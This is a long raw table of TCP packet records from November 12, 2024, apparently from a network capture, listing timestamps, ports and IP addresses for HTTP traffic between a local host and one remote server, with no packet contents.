Nov 12, 2024 00:06:06.619488955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619503975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619514942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619524956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619525909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619539022 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619541883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619548082 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619554043 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619564056 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619570017 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619581938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619590998 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619595051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619601011 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619613886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619616985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619628906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619638920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619642973 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619645119 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619651079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619657040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619659901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619704962 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619718075 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619848967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619860888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619872093 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619884014 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619888067 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619895935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619905949 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619906902 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619914055 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619923115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619935989 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619946003 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619959116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619961023 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619968891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619971037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619973898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619980097 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619982004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.619985104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619991064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.619999886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620021105 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620024920 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620032072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620044947 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620049000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620064020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620068073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620074987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620085955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620086908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620096922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620107889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620109081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620119095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620125055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620129108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620130062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620135069 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620140076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620156050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620176077 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620182037 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620193005 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620199919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620212078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620218039 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620218992 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620223045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620239019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620249033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620260000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620260954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620271921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620284081 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620295048 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620296955 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620310068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620316029 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620321989 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620332003 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620332956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620343924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620351076 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620359898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620366096 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620367050 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620371103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620381117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620393038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620397091 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620408058 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620414019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620419025 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620419979 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620434999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620445967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620455980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620460033 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620466948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620477915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620479107 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620490074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620500088 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620501995 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620512009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620522022 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620523930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620534897 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620547056 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620548010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620573997 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620592117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620668888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620708942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620829105 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620841026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620846987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620851994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620867968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620879889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620882034 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620891094 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620901108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620901108 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620913029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620923996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620927095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620929956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620942116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620949030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620959997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620971918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620978117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.620982885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.620994091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621000051 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621006012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621016026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621026039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621027946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621038914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621051073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621054888 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621059895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621067047 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621092081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621113062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621120930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621124983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621135950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621148109 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621155024 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621159077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621169090 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621170998 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621181965 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621193886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621203899 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621206999 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621217012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621227980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621227980 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621233940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621244907 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621268034 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621285915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621296883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621296883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621308088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621319056 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621330023 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621342897 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621351004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621351004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621354103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621365070 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621375084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621380091 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621385098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621397018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621409893 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621432066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621432066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621432066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621481895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621790886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621800900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621810913 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621823072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621828079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621834040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621850967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621861935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621862888 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621872902 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621880054 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621880054 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621886015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621896982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621907949 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621908903 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621922016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621932983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621937990 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621944904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621949911 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621974945 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.621990919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.621997118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622001886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622013092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622021914 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622024059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622035027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622041941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622046947 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622057915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622059107 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622068882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622081995 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622087955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622092962 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622103930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622107029 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622126102 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622145891 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622154951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622165918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622175932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622189045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622200012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622205019 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622211933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622216940 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622222900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622235060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622245073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622245073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622256994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622267962 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622272968 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622277975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622288942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622297049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622307062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622313023 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622322083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622329950 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622334003 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622339964 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622345924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622355938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622358084 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622365952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622378111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622380972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622384071 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622400045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622436047 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622621059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622637987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622649908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622662067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622661114 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622673035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622682095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622684002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622695923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622699976 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622724056 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622731924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622735977 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622746944 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622757912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622773886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622776031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622785091 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622786045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622797012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622803926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622813940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622824907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622828960 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622836113 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622847080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622847080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622858047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622868061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.622865915 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622889042 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.622911930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624033928 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624088049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624685049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624696016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624706984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624718904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624728918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624730110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624735117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624746084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624757051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624759912 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624768972 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624769926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624779940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624789000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624790907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624803066 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624810934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624814034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624825001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624826908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624841928 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624855042 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624855995 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624865055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624876022 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624878883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624886990 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624891043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624902010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624913931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624917984 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624924898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624937057 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624944925 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624948025 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624958992 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624967098 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.624969959 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.624980927 CET	80	49704	185.215.113.206	192.168.2.5
